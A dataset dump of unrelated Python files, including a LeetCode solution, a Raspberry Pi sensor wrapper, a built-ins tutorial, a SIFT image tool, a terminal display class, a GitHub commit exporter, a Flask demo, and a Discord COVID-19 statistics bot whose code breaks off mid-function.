text stringlengths 38 1.54M |
|---|
class Solution(object):
    def dailyTemperatures(self, T):
        """
        For each day, compute how many days to wait for a warmer temperature.

        Monotonic-stack solution: the stack holds indices of days whose warmer
        day has not been seen yet; their temperatures are strictly decreasing,
        so each index is pushed and popped at most once (O(n)).

        Improvements over the original: the outer `if` duplicated the `while`
        condition and is removed; the stack stores bare indices instead of
        (temperature, index) tuples, since the temperature is recoverable via T.

        :type T: List[int]
        :rtype: List[int]
        """
        wait = [0] * len(T)  # days to wait for a warmer day (0 = never)
        stack = []  # indices of days still waiting; T[stack] strictly decreasing
        for i, temp in enumerate(T):
            # Resolve every pending day that today's temperature beats.
            while stack and temp > T[stack[-1]]:
                prev = stack.pop()
                wait[prev] = i - prev
            stack.append(i)
        return wait
|
import RPi.GPIO as GPIO
class TrackSensor(object):
    """Wrapper around a 5-way line-tracking sensor driven through RPi.GPIO."""

    def __init__(self, db):
        """
        Store the five sensor pin numbers and configure them as inputs.

        :param db: pin-number mapping from setup.py (keys ``track_left2`` ..
            ``track_right2``)
        """
        self.left2 = db['track_left2']
        self.left1 = db['track_left1']
        self.center = db['track_center']
        self.right1 = db['track_right1']
        self.right2 = db['track_right2']
        self.setup()

    def setup(self):
        """Configure every sensor pin as a GPIO input."""
        for pin in (self.left2, self.left1, self.center, self.right1, self.right2):
            GPIO.setup(pin, GPIO.IN)

    def getStatus(self):
        """
        Read the raw sensor values.

        :return: tuple (left2, left1, center, right1, right2)
        """
        return (
            GPIO.input(self.left2),
            GPIO.input(self.left1),
            GPIO.input(self.center),
            GPIO.input(self.right1),
            GPIO.input(self.right2),
        )

    def getReversedStatus(self):
        """
        Same reading as getStatus(), but every value is inverted (0 <-> 1).

        :return: tuple (left2, left1, center, right1, right2), inverted
        """
        left2, left1, center, right1, right2 = self.getStatus()
        return 1 - left2, 1 - left1, 1 - center, 1 - right1, 1 - right2
|
# abs: absolute value
print(abs(3)); print(abs(-3.5))
# all: True when every element is truthy; False as soon as one is falsy
print(all([0,3,4,5]))
# any: True when at least one element is truthy; False when all are falsy
print(any([1,2,3,0]))
# dir: list the attributes and methods an object supports
print(dir([1,2,3]))
# divmod: quotient and remainder of a divided by b, returned as a tuple
print(divmod(7,3))
# enumerate: wrap an ordered iterable into (index, value) pairs
for i, name in enumerate(['body','foo','bar']):
    print(i, name)
# eval(expression): evaluate a string as a Python expression and return the result
print(eval('1+2')); print(eval("'hi'+'a'")); print(eval('divmod(4,3)'))
# filter: three equivalent ways of keeping only the positive numbers
def positive(l):
    result = []
    for i in l:
        if i>0:
            result.append(i)
    return result
print(positive([1,-3,2,0,-5,6]))
def positive2(x):
    return x>0
print(list(filter(positive2, [1,-3,2,0,-5,6])))
print(list(filter(lambda x: x>0,[1,-3,2,0,-5,6])))
# int: parse a string in the given base (binary, then hexadecimal)
print(int('11',2)); print(int('1A',16))
# list: build a list from any iterable
print(list("python"))
# pow: exponentiation
print(pow(2,4))
# range
print(list(range(5)))
print(list(range(5,10)))
print(list(range(1,10,2))) # third argument is the step between numbers
# round: round to the given number of decimal places
print(round(5.678,2))
# sorted: return a new sorted list
print(sorted("zero"))
# type
print(type("abd"))
print(type([]))
# -*- coding: utf-8 -*-
import sys, os
sys.path.append('../siftsample')
# ここまでおまじない
import numpy, pylab
from siftsample import SiftSample
class Prob25(SiftSample):
    def _process_image(self, resultname, params):
        """Process the image and save the result to a file.

        Detects MSER regions with the VLFeat ``mser`` tool, then computes SIFT
        descriptors on those frames with the ``sift`` tool, writing them to
        *resultname*.
        """
        if self._is_color:
            self.convert_grey()
        if self._image_name[-3:] != 'pgm':
            # The VLFeat binaries require PGM input; write a temporary copy.
            self._image_obj.save('tmp.pgm')
            self._image_name = 'tmp.pgm'
        m_cmmd = str("mser " + self._image_name + " --frames=tmp.mser")
        # NOTE(review): "read-frames" is concatenated directly onto *params*
        # with no separating " --"; unless callers always pass params ending in
        # "--", this produces a malformed sift command line — confirm against
        # the callers and the VLFeat sift documentation.
        s_cmmd = str("sift " + self._image_name +" --output=" + resultname + " " + params + "read-frames=tmp.mser")
        os.system(m_cmmd)
        os.system(s_cmmd)
        self._sift_name = resultname
        # Clean up the temporary PGM (or original working copy) and MSER frames.
        os.remove(self._image_name)
        os.remove("tmp.mser")
|
import sys, time
class Display:
    """A rectangular viewport onto a shared, class-level character buffer.

    Class attributes (Display.data, Display.width, Display.color, ...) are
    created by setdisplay() and by the module-level assignments that follow
    the class; instances only describe a viewport (size, offsets, scroll and
    cursor state).
    """

    def __init__(self, width, height, xoffset=0, yoffset=0, reversehori=False, reversevert=False):
        # Viewport geometry inside the shared buffer.
        self.width = width
        self.height = height
        self.xoffset = xoffset
        self.yoffset = yoffset
        # When set, content is aligned to the right / bottom edge instead.
        self.reversehori = reversehori
        self.reversevert = reversevert
        # Scroll position of the displayed file inside this viewport.
        self.xbufferoffset = 0
        self.ybufferoffset = 0
        # Cursor position relative to the viewport origin.
        self.xcursor = 0
        self.ycursor = 0

    def getsize(self):
        """Return (width, height) of this viewport."""
        return self.width, self.height

    def getcursor(self):
        """Return the cursor position relative to the viewport."""
        return self.xcursor, self.ycursor

    def getbufferoffset(self):
        """Return the current scroll offset (x, y)."""
        return self.xbufferoffset, self.ybufferoffset

    def fillwindow(self, value=" "):
        """Fill the shared buffer from this instance's offsets to the full display size."""
        for i in range(self.yoffset, Display.height):
            row = Display.data[i]
            for j in range(self.xoffset, Display.width):
                row[j] = value

    def setbufferoffset(self, x, y):
        """Scroll so that buffer cell (x, y) is visible, then update the cursor."""
        # Horizontal: scroll only as far as needed in either direction.
        if x < self.xbufferoffset:
            self.xbufferoffset = x
        elif x + 1 >= self.xbufferoffset + self.width:
            self.xbufferoffset = x + 1 - self.width
        self.xcursor = x - self.xbufferoffset
        # Vertical: same clamping logic.
        if y < self.ybufferoffset:
            self.ybufferoffset = y
        elif y + 1 >= self.ybufferoffset + self.height:
            self.ybufferoffset = y + 1 - self.height
        self.ycursor = y - self.ybufferoffset

    def applyfile(self, fl):
        """Render file object *fl* into the shared buffer for this viewport."""
        data = fl.getdata()
        x, y = fl.smartget()
        # Selection rectangle translated into viewport coordinates.
        # NOTE(review): this uses the scroll offsets from *before*
        # setbufferoffset() below may rescroll — confirm that is intentional.
        x1, y1, x2, y2 = fl.getselection()
        x1 -= self.xbufferoffset
        y1 -= self.ybufferoffset
        x2 -= self.xbufferoffset
        y2 -= self.ybufferoffset
        self.setbufferoffset(x, y)
        yoffset = self.yoffset
        if self.reversevert:
            # Bottom-align files shorter than the viewport.
            yoffset = max(0, self.height - self.yoffset - fl.len())
        rows = min(fl.len() - self.ybufferoffset, self.height - yoffset)
        xoffset = self.xoffset
        if self.reversehori:
            # Right-align based on the widest visible line.
            xoffset = max(0, self.width - self.xoffset - fl.maxlencolumn(self.ybufferoffset, self.ybufferoffset + self.height) + 1)
        self.xcursoroffset = xoffset
        self.ycursoroffset = yoffset
        i = 0
        while i < rows:
            line = data[i + self.ybufferoffset]
            columns = min(len(line) - self.xbufferoffset, self.width - xoffset)
            j = 0
            while j < columns:
                # Cells appear to be small mutable sequences; copy so the
                # file's own data is never mutated (assumption — confirm).
                char = line[j + self.xbufferoffset][:]
                pre = ""
                # Highlight cells inside the selection rectangle.
                if (i > y1 or (i == y1 and j >= x1)) and (i < y2 or (i == y2 and j <= x2)):
                    pre = Display.color["black"] + Display.color["greyback"]
                if char[0] == "\n":
                    char[0] = "^"
                # NOTE(review): this second test can never be true after the
                # rewrite above — possibly a different character was intended.
                if char[0] == "\n":
                    char[0] = " "
                elif char[0] == "\x1b":
                    # Make a literal escape character visible.
                    char[0] = Display.color["cyan"] + "µ"
                Display.data[i + yoffset][j + xoffset] = pre + char[3] + char[2] + char[1] + char[0]
                j += 1
            i += 1

    def outputcursor(self):
        """ANSI sequence moving the terminal cursor to this viewport's cursor."""
        return Display.translate(self.xcursor + self.xcursoroffset, self.ycursor + self.ycursoroffset)

    # The helpers below take no self and are invoked on the class itself
    # (e.g. Display.translate(...)).
    def rgb_to_ansi(r, g, b, background=False):
        """256-colour cube escape (16 + 36r + 6g + b); components expected in 0-5."""
        return "\x1b[%d;5;%dm" % (48 if background else 38, 16 + 36 * round(r) + 6 * round(g) + round(b))

    def grey_to_ansi(v, background=False):
        """Greyscale-ramp escape (palette entries 232-255)."""
        return "\x1b[%d;5;%dm" % (48 if background else 38, 232 + v)

    def flipansi(ansi):
        """Turn a foreground colour escape into the matching background one (38 -> 48)."""
        return ansi[ : 2] + ("3" if ansi[3] == "4" else "4") + ansi[3 : ]

    def translate(x, y):
        """ANSI cursor-positioning escape for 0-based coordinates (x, y)."""
        return "\x1b[%d;%dH" % (y + 1, x + 1)

    def screen(show):
        """Escape entering (True) or leaving (False) the alternate screen buffer."""
        if show:
            return Display.buffer1
        return Display.buffer2

    def cursor(show):
        """Escape showing (True) or hiding (False) the terminal cursor."""
        if show:
            return Display.cursor1
        return Display.cursor2

    def setdisplay(width, height, xoffset=0, yoffset=0):
        """Initialise the shared buffer and the global display geometry."""
        Display.width, Display.height, Display.xoffset, Display.yoffset = width, height, xoffset, yoffset
        Display.data = [[" "] * Display.width for _ in range(Display.height)]

    def filldisplay(value=" "):
        """Overwrite every cell of the shared buffer with *value*."""
        for row in Display.data:
            for j, char in enumerate(row):
                row[j] = value

    def outputdisplay():
        """Serialise the shared buffer into one ANSI string, minimising colour changes."""
        output = ""
        lastcolor = ""
        i = 0
        for line in Display.data:
            output += Display.translate(Display.xoffset, Display.yoffset + i)
            for char in line:
                # A cell is "<colour prefix><printable char>"; split off the last char.
                char, color = char[-1], char[ : -1]
                if lastcolor != color:
                    # Only emit an escape when the colour actually changes.
                    output += Display.normal + (color if color else "")
                    lastcolor = color
                output += char
            i += 1
        return output + Display.normal

    def startloading(width):
        """Animate a spinner on stdout until stoploading() clears Display.loading.

        Intended to run on a worker thread; hides the cursor while spinning.
        """
        sys.stdout.write(Display.cursor(False))
        sys.stdout.flush()
        Display.loading = True
        wheel = ["|/-\\", "\\|/-", "-\\|/", "/-\\|"]
        wheel = [(w + "Loading" + w) * 1000 for w in wheel]
        i = 0
        while Display.loading:
            # Centre the marquee inside the available width.
            m = max(0, len(wheel[i]) - Display.width) // 2
            w = wheel[i][m : m + Display.width]
            l = max(0, width - len(w))
            sys.stdout.write("\x1b[%dD" % width + w + " " * l + "\x1b[%dD" % (l - 1))
            sys.stdout.flush()
            i = (1 + i) % len(wheel)
            time.sleep(0.1)
        # Clear the spinner line before returning.
        sys.stdout.write("\x1b[2K\x1b[%dD" % width)
        sys.stdout.flush()

    def stoploading(thread):
        """Stop the spinner running on *thread* and restore the cursor."""
        if Display.loading:
            sys.stdout.write(Display.cursor(True))
            sys.stdout.flush()
            Display.loading = False
            thread.join()
# ANSI escape sequences attached to the class as constants.
Display.cursor1 = "\x1b[?25h"  # show the terminal cursor
Display.cursor2 = "\x1b[?25l"  # hide the terminal cursor
Display.buffer1 = "\x1b[?1049h"  # switch to the alternate screen buffer
Display.buffer2 = "\x1b[?1049l"  # switch back to the normal screen buffer
Display.normal = "\x1b[0m"  # reset all attributes
Display.crosscolor = Display.grey_to_ansi(7, True)
# Named colour palette; "...back" entries are background variants via flipansi().
Display.color = {"grey" : Display.rgb_to_ansi(3, 3, 3), "white" : Display.rgb_to_ansi(5, 5, 5),
                 "red" : Display.rgb_to_ansi(4, 1, 1), "blue" : Display.rgb_to_ansi(2, 3, 5),
                 "green" : Display.rgb_to_ansi(1, 4, 1), "yellow" : Display.rgb_to_ansi(4, 4, 1),
                 "pink" : Display.rgb_to_ansi(4, 1, 4), "cyan" : Display.rgb_to_ansi(1, 4, 4),
                 "purple" : Display.rgb_to_ansi(3, 1, 5), "clear" : "",
                 "black" : Display.rgb_to_ansi(0, 0, 0),
                 "greyback" : Display.flipansi(Display.rgb_to_ansi(3, 3, 3)),
                 "blueback" : Display.flipansi(Display.rgb_to_ansi(1, 1, 3))}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#makedocument_ns.py
###example################################
#python makedocument_ns.py directory_path
##########################################
import sys
from github import Github
#get token
t = open('token','r')
token = t.read()
token = token.rstrip('\n')
#Create GitHub INSTANCE
g = Github(token)
t.close()
#show repositoory from repository fullname
repo_name = raw_input("Repository_Name>")
#take repository info
repo = g.get_repo(repo_name)
argvs = sys.argv
try:
path = argvs[1]
except IndexError:
print "please specify directory path to save txt file!!"
sys.exit()
doc = open(path+'/repo_files.txt','w')
revision = repo.get_commits()
n=0
for rev in revision:
n=n+1
print "commit..."
print n
doc.write(rev.commit.message.encode('utf-8').replace("\n",""))
doc.write("\n")
if n == 50:
break
|
from flask import Flask, redirect, url_for
# Minimal Flask demo of redirect() + url_for().
app = Flask(__name__)


@app.route('/')
def index():
    # Landing page: a single link pointing at the redirecting route.
    return '<a href="/goto">Go to</a>'


@app.route('/goto')
def goto():
    # Redirect by endpoint name; url_for avoids hard-coding the target URL.
    return redirect(url_for('user_page'))


@app.route('/user')
def user_page():
    return 'User page'
|
import datetime as dt
import logging
import os
import time
from typing import Union
import discord
from aiomysql import IntegrityError
from discord.ext import commands
from discord_slash.context import SlashContext
import src.utils as utils
from src.plotting import plot_bar_daily, plot_csv
logger = logging.getLogger("covid-19")
async def list_countries_command(bot, ctx: Union[commands.Context, SlashContext]):
    """Send the full list of affected countries as paginated embeds.

    Fixes the original pagination, which always emitted an empty first page
    and built pages longer than the Discord description limit.
    """
    data = await utils.get(bot.http_session, "/all")
    # Build pages of country names, each kept under the embed size limit.
    pages = []
    current = ""
    for c in data:
        entry = c["country"] + ", "
        # Flush the page *before* it would exceed the limit.
        if current and len(current) + len(entry) >= utils.DISCORD_LIMIT:
            pages.append(current)
            current = ""
        current += entry
    if current:
        pages.append(current)
    embeds = []
    for page in pages:
        embeds.append(discord.Embed(
            description=page.rstrip(", "),
            color=utils.COLOR,
            timestamp=utils.discord_timestamp()
        ))
    for i, _embed in enumerate(embeds):
        _embed.set_author(
            name=f"All countries affected by Coronavirus COVID-19 - Page {i + 1}",
            icon_url=bot.author_thumb
        )
        _embed.set_footer(text=utils.last_update(data[0]["lastUpdate"]),
                          icon_url=bot.user.avatar_url)
        _embed.set_thumbnail(url=bot.thumb + str(time.time()))
        await ctx.send(embed=_embed)
async def info_command(bot, ctx: Union[commands.Context, SlashContext]):
    """Send worldwide COVID-19 stats plus the cached world-history graph."""
    data = await utils.get(bot.http_session, "/all")
    text = utils.string_formatting(data)
    embed = discord.Embed(
        description=text,
        color=utils.COLOR,
        timestamp=utils.discord_timestamp()
    )
    embed.set_author(
        name=f"All countries affected by Coronavirus COVID-19",
        url="https://www.who.int/home",
        icon_url=bot.author_thumb
    )
    embed.set_thumbnail(url=bot.thumb + str(time.time()))
    embed.set_footer(text="coronavirus.jessicoh.com/api | " + utils.last_update(data[0]["lastUpdate"]),
                     icon_url=bot.user.avatar_url)
    # The graph is cached on disk; regenerate it only when missing.
    if not os.path.exists(utils.STATS_PATH):
        history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/total")
        history_recovered = await utils.get(bot.http_session, f"/history/recovered/total")
        history_deaths = await utils.get(bot.http_session, f"/history/deaths/total")
        await plot_csv(
            utils.STATS_PATH,
            history_confirmed,
            history_recovered,
            history_deaths)
    # Attach the graph image to the embed.
    with open(utils.STATS_PATH, "rb") as p:
        img = discord.File(p, filename=utils.STATS_PATH)
        embed.set_image(url=f'attachment://{utils.STATS_PATH}')
        await ctx.send(file=img, embed=embed)
async def country_command(bot, ctx: Union[commands.Context, SlashContext], countries):
    """Send stats lines for every country matching the given names/ISO codes.

    Fixes the original pagination: when a page filled up, its embed was built
    from the wrong accumulator and never appended, silently dropping pages.
    """
    if not len(countries):
        await ctx.send("No country provided")
        return
    data = await utils.get(bot.http_session, "/all")
    embeds = []
    text = ""
    i = 0
    matched = []  # countries already rendered, to avoid duplicates
    countries = list(map(lambda x: x.lower(), countries))
    for d in data:
        for country in countries:
            # Alternate bold/plain lines for readability.
            bold = "**" if i % 2 == 0 else ""
            data_country = d['country'].lower()
            if (data_country.startswith(country) or
                    d['iso2'].lower() == country or
                    d['iso3'].lower() == country) \
                    and data_country not in matched:
                line = f"{bold}{d['country']} : {d['totalCases']:,} confirmed [+{d['newCases']:,}] - {d['totalRecovered']:,} recovered - {d['totalDeaths']:,} deaths [+{d['newDeaths']:,}]{bold}\n"
                # Flush the page before it would exceed the embed size limit.
                if text and len(text) + len(line) >= utils.DISCORD_LIMIT:
                    embeds.append(discord.Embed(
                        title="Countries affected",
                        description=text,
                        timestamp=utils.discord_timestamp(),
                        color=utils.COLOR
                    ))
                    text = ""
                text += line
                matched.append(data_country)
                i += 1
    if text:
        embeds.append(discord.Embed(
            description=text,
            timestamp=utils.discord_timestamp(),
            color=utils.COLOR
        ))
    for i, _embed in enumerate(embeds):
        _embed.set_author(
            name=f"Countries affected",
            icon_url=bot.author_thumb
        )
        _embed.set_footer(
            text=f"coronavirus.jessicoh.com/api/ | {utils.last_update(data[0]['lastUpdate'])} | Page {i + 1}",
            icon_url=bot.user.avatar_url)
        _embed.set_thumbnail(url=bot.thumb + str(time.time()))
        await ctx.send(embed=_embed)
async def stats_command(bot, ctx: Union[commands.Context, SlashContext], country):
    """Send a stats embed plus a history graph, worldwide or for one country.

    *country* is a sequence of words; a leading "log" switches the graph to a
    logarithmic scale. Falls back to the world graph when the country lookup
    or graph generation fails.
    """
    is_log = False
    graph_type = "Linear"
    embed = discord.Embed(
        description=utils.mkheader(),
        timestamp=dt.datetime.utcnow(),
        color=utils.COLOR
    )
    # Fix: bind before branching — the original only assigned this on the
    # world-stats path, so the per-country path crashed with a NameError.
    splited = country
    if len(country) == 1 and country[0].lower() == "log" or not len(country):
        # World stats (optionally logarithmic).
        data = await utils.get(bot.http_session, f"/all/world")
        if len(splited) == 1 and splited[0].lower() == "log":
            embed.set_author(
                name="Coronavirus COVID-19 logarithmic stats",
                icon_url=bot.author_thumb
            )
            is_log = True
            path = utils.STATS_LOG_PATH
            graph_type = "Logarithmic"
        elif not len(country):
            path = utils.STATS_PATH
    else:
        try:
            if splited[0].lower() == "log":
                # "log <country...>": logarithmic per-country graph.
                is_log = True
                joined = ' '.join(country[1:]).lower()
                data = await utils.get(bot.http_session, f"/all/{joined}")
                path = data["iso2"].lower() + utils.STATS_LOG_PATH
            else:
                joined = ' '.join(country).lower()
                data = await utils.get(bot.http_session, f"/all/{joined}")
                path = data["iso2"].lower() + utils.STATS_PATH
            # Graphs are cached on disk per country; regenerate only when missing.
            if not os.path.exists(path):
                history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{joined}")
                history_recovered = await utils.get(bot.http_session, f"/history/recovered/{joined}")
                history_deaths = await utils.get(bot.http_session, f"/history/deaths/{joined}")
                await plot_csv(
                    path,
                    history_confirmed,
                    history_recovered,
                    history_deaths,
                    logarithmic=is_log)
        except Exception as e:
            # Unknown country or API/plot failure: fall back to world stats so
            # the reads below never hit an unbound `data` (previously a crash).
            logger.exception(e, exc_info=True)
            path = utils.STATS_PATH
            data = await utils.get(bot.http_session, f"/all/world")
    confirmed = data["totalCases"]
    recovered = data["totalRecovered"]
    deaths = data["totalDeaths"]
    active = data["activeCases"]
    if data['iso2']:
        embed.set_author(
            name=f"Coronavirus COVID-19 {graph_type} graph - {data['country']}",
            icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
        )
    else:
        embed.set_author(
            name=f"Coronavirus COVID-19 {graph_type} graph - {data['country']}",
            icon_url=bot.author_thumb
        )
    embed.add_field(
        name="<:confirmed:688686089548202004> Confirmed",
        value=f"{confirmed:,}"
    )
    embed.add_field(
        name="<:recov:688686059567185940> Recovered",
        value=f"{recovered:,} (**{utils.percentage(confirmed, recovered)}**)"
    )
    embed.add_field(
        name="<:_death:688686194917244928> Deaths",
        value=f"{deaths:,} (**{utils.percentage(confirmed, deaths)}**)"
    )
    embed.add_field(
        name="<:_calendar:692860616930623698> Today confirmed",
        value=f"+{data['newCases']:,} (**{utils.percentage(confirmed, data['newCases'])}**)"
    )
    embed.add_field(
        name="<:_calendar:692860616930623698> Today deaths",
        value=f"+{data['newDeaths']:,} (**{utils.percentage(confirmed, data['newDeaths'])}**)"
    )
    embed.add_field(
        name="<:bed_hospital:692857285499682878> Active",
        value=f"{active:,} (**{utils.percentage(confirmed, active)}**)"
    )
    embed.add_field(
        name="<:critical:752228850091556914> Serious critical",
        value=f"{data['seriousCritical']:,} (**{utils.percentage(confirmed, data['seriousCritical'])}**)"
    )
    if data["totalTests"]:
        percent_pop = ""
        if data["population"]:
            percent_pop = f"(**{utils.percentage(data['population'], data['totalTests'])}**)"
        embed.add_field(
            name="<:test:752252962532884520> Total test",
            value=f"{data['totalTests']:,} {percent_pop}"
        )
        embed.add_field(
            name="<:population:768055030813032499> Population",
            value=f"{data['population']:,}"
        )
    # World graph fallback/initial generation.
    if not os.path.exists(path):
        history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/total")
        history_recovered = await utils.get(bot.http_session, f"/history/recovered/total")
        history_deaths = await utils.get(bot.http_session, f"/history/deaths/total")
        await plot_csv(
            path,
            history_confirmed,
            history_recovered,
            history_deaths,
            logarithmic=is_log)
    with open(path, "rb") as p:
        img = discord.File(p, filename=path)
        embed.set_footer(
            text="coronavirus.jessicoh.com/api/ | " +
            utils.last_update(data["lastUpdate"]),
            icon_url=bot.user.avatar_url
        )
        embed.set_thumbnail(
            url=bot.thumb + str(time.time())
        )
        embed.set_image(url=f'attachment://{path}')
        await ctx.send(file=img, embed=embed)
def get_idx(args, val):
    """Return the index of *val* in *args*, or -1 if absent."""
    try:
        return args.index(val)
    except ValueError:
        return -1


def convert_interval_type(_type):
    """Map an interval unit name to its size in hours (1 for unknown units)."""
    return {
        "hours": 1,
        "days": 24,
        "weeks": 168,
        "hour": 1,
        "day": 24,
        "week": 168
    }.get(_type, 1)


def unpack_notif(args, val):
    """Parse notification arguments of the form ``<country...> every N <unit>``.

    Returns (country_lowercase, interval_in_hours, interval_type). On any
    malformed input the interval falls back to 1 and the whole argument list
    is treated as the country name.

    Fixes over the original: the leftover debug print is removed, the bare
    ``except`` is narrowed, and an empty *args* no longer raises a NameError
    (``interval_type`` now has a default).
    """
    interval_type = "hours"  # default unit when args is empty or malformed
    try:
        idx = get_idx(args, val)
        interval_type = args[len(args) - 1].lower()
        interval = int(args[idx + 1])
        if idx != -1 and 1 <= interval <= 24:
            country = " ".join(args[0:idx])
        else:
            interval = 1
            country = " ".join(args)
    except (ValueError, IndexError):
        interval = 1
        country = " ".join(args)
    return country.lower(), interval * convert_interval_type(interval_type), interval_type
class ContextError(Exception):
    """Raised when a command is invoked with an unsupported context object."""
async def notification_command(bot, ctx: Union[commands.Context, SlashContext], country="all", interval: int = None, interval_type=None, state: list = []):
    """Enable, update or disable periodic COVID-19 notifications for a channel.

    Requires the Administrator permission. Text commands pass raw words in
    *state* (parsed via unpack_notif); slash commands pass the parameters
    directly.

    Fixes over the original: leftover debug prints removed, the user-facing
    "notififcation" typo corrected, "disable" handled before the enable flow
    (it previously always failed the country lookup first), and the footer no
    longer dereferences `all_data` on paths where it was never fetched.
    """
    if type(ctx) == commands.Context:
        # Classic text command: everything arrives in *state*.
        country, interval, interval_type = unpack_notif(
            state,
            "every"
        )
        guild_permissions = ctx.message.author.guild_permissions
    elif type(ctx) == SlashContext:
        interval = int(interval)
        guild_permissions = ctx.author.guild_permissions
    else:
        raise ContextError(f"Context error : {ctx}")
    if not guild_permissions.administrator:
        return await ctx.send("You need to have Administrator permission to set notification on !")
    try:
        prefix = await bot.getg_prefix(ctx.guild.id)
    except Exception:
        prefix = "c!"
    all_data = None
    if country == "disable":
        await bot.delete_notif(str(ctx.guild.id))
        embed = discord.Embed(
            title="Notifications successfully disabled",
            description="Notifications are now interrupted in this channel."
        )
    elif len(state) or interval is not None:
        all_data = await utils.get(bot.http_session, "/all/")
        try:
            data = utils.get_country(all_data, country)
            try:
                await bot.insert_notif(str(ctx.guild.id), str(ctx.channel.id), country, interval)
            except IntegrityError:
                # A notification already exists for this guild: update it.
                await bot.update_notif(str(ctx.guild.id), str(ctx.channel.id), country, interval)
            if country != "all":
                embed = discord.Embed(
                    description=f"You will receive a notification in this channel on data update. `{prefix}notification disable` to disable the notifications"
                )
                embed.set_author(
                    name="Notifications successfully enabled",
                    icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
                )
                embed.add_field(
                    name="Country",
                    value=f"**{data['country']}**"
                )
            else:
                embed = discord.Embed(
                    description=f"You will receive a notification in this channel on data update. `{prefix}notification disable` to disable the notifications"
                )
                embed.set_author(
                    name="Notifications successfully enabled",
                    icon_url=bot.author_thumb
                )
                embed.add_field(
                    name="Country",
                    value=f"**World stats**"
                )
            embed.add_field(
                name="Next update",
                value=f"**{interval // convert_interval_type(interval_type)} {interval_type}**"
            )
        except Exception as e:
            embed = discord.Embed(
                title=f"{prefix}notification",
                description=f"Make sure that you didn't have made any mistake, please retry\n`{prefix}notification <country | disable> [every NUMBER] [hours | days | weeks]`\n__Examples__ : `{prefix}notification usa every 3 hours` (send a message to the current channel every 3 hours about United States), `{prefix}notification united states every 1 day`, `{prefix}notification disable`"
            )
            embed.add_field(
                name="Report this error to the developer please ! :heart:",
                value=f"{type(e).__name__} : {e}"
            )
            logger.exception(e, exc_info=True)
    else:
        # No arguments at all: show usage help.
        embed = discord.Embed(
            title=f"{prefix}notification",
            description=f"Make sure that you didn't have made any mistake, please retry\n`{prefix}notification <country | disable> [every NUMBER] [hours | days | weeks]`\n__Examples__ : `{prefix}notification usa every 3 hours` (send a message to the current channel every 3 hours about United States), `{prefix}notification united states every 1 day`, `{prefix}notification disable`"
        )
    embed.color = utils.COLOR
    embed.timestamp = utils.discord_timestamp()
    embed.set_thumbnail(url=bot.thumb + str(time.time()))
    if all_data:
        embed.set_footer(
            text="coronavirus.jessicoh.com/api/ | " +
            utils.last_update(all_data[0]["lastUpdate"]),
            icon_url=bot.user.avatar_url
        )
    else:
        embed.set_footer(
            text="coronavirus.jessicoh.com/api/",
            icon_url=bot.user.avatar_url
        )
    await ctx.send(embed=embed)
async def track_command(bot, ctx: Union[commands.Context, SlashContext], *country):
    """Enable, change or disable DM tracking of one country for the calling user."""
    try:
        prefix = await bot.getg_prefix(ctx.guild.id)
    except:
        # Fall back to the default prefix (e.g. when the guild lookup fails).
        prefix = "c!"
    if not len(country):
        # No argument: show usage help.
        embed = discord.Embed(
            description=f"No country provided. **`{prefix}track <COUNTRY>`** work like **`{prefix}country <COUNTRY>`** see `{prefix}help`",
            color=utils.COLOR,
            timestamp=utils.discord_timestamp()
        )
        embed.set_author(
            name=f"{prefix}track",
            icon_url=bot.author_thumb
        )
    elif ''.join(country) == "disable":
        embed = discord.Embed(
            description=f"If you want to reactivate the tracker : **`{prefix}track <COUNTRY>`**",
            color=utils.COLOR,
            timestamp=utils.discord_timestamp()
        )
        embed.set_author(
            name="Tracker has been disabled!",
            icon_url=bot.author_thumb
        )
        try:
            await bot.delete_tracker(str(ctx.author.id))
        except:
            # Best effort: deleting a non-existing tracker is not an error here.
            pass
    else:
        all_data = await utils.get(bot.http_session, "/all/")
        country = ' '.join(country)
        data = utils.get_country(all_data, country)
        if data is not None:
            try:
                await bot.insert_tracker(str(ctx.author.id), str(ctx.guild.id), country)
            except IntegrityError:
                # A tracker already exists for this user: update it instead.
                await bot.update_tracker(str(ctx.author.id), country)
            embed = discord.Embed(
                description=f"{utils.mkheader()}You will receive stats about {data['country']} in DM",
                color=utils.COLOR,
                timestamp=utils.discord_timestamp()
            )
            embed.set_author(
                name="Tracker has been set up!",
                icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
            )
        else:
            embed = discord.Embed(
                description="Wrong country selected.",
                color=utils.COLOR,
                timestamp=utils.discord_timestamp()
            )
            embed.set_author(
                name=f"{prefix}track",
                icon_url=bot.author_thumb
            )
    embed.set_thumbnail(url=bot.thumb + str(time.time()))
    embed.set_footer(
        text="coronavirus.jessicoh.com/api/",
        icon_url=bot.user.avatar_url
    )
    await ctx.send(embed=embed)
async def region_command(bot, ctx: Union[commands.Context, SlashContext], *params):
    """Show stats for a region/state of a country, or list all its regions."""
    if len(params):
        country, state = utils.parse_state_input(*params)
        try:
            if state == "all":
                # List every region of the country across paginated embeds.
                history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{country}/regions")
                history_recovered = await utils.get(bot.http_session, f"/history/recovered/{country}/regions")
                history_deaths = await utils.get(bot.http_session, f"/history/deaths/{country}/regions")
                embeds = utils.region_format(
                    history_confirmed, history_recovered, history_deaths)
                for i, _embed in enumerate(embeds):
                    _embed.set_author(
                        name=f"All regions in {country}",
                        icon_url=bot.author_thumb
                    )
                    _embed.set_footer(
                        text=f"coronavirus.jessicoh.com/api/ | Page {i + 1}",
                        icon_url=bot.user.avatar_url)
                    _embed.set_thumbnail(
                        url=bot.thumb + str(time.time()))
                    await ctx.send(embed=_embed)
                return
            else:
                path = state.lower().replace(" ", "_") + utils.STATS_PATH
                history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{country}/{state}")
                history_recovered = await utils.get(bot.http_session, f"/history/recovered/{country}/{state}")
                history_deaths = await utils.get(bot.http_session, f"/history/deaths/{country}/{state}")
                # Latest cumulative values are the last entries of each history.
                confirmed = list(history_confirmed["history"].values())[-1]
                deaths = list(history_deaths["history"].values())[-1]
                try:
                    is_us = False
                    recovered = list(
                        history_recovered["history"].values())[-1]
                    active = confirmed - (recovered + deaths)
                except:
                    # Presumably US regions lack a recovered series — confirm.
                    is_us = True
                    recovered = 0
                    active = 0
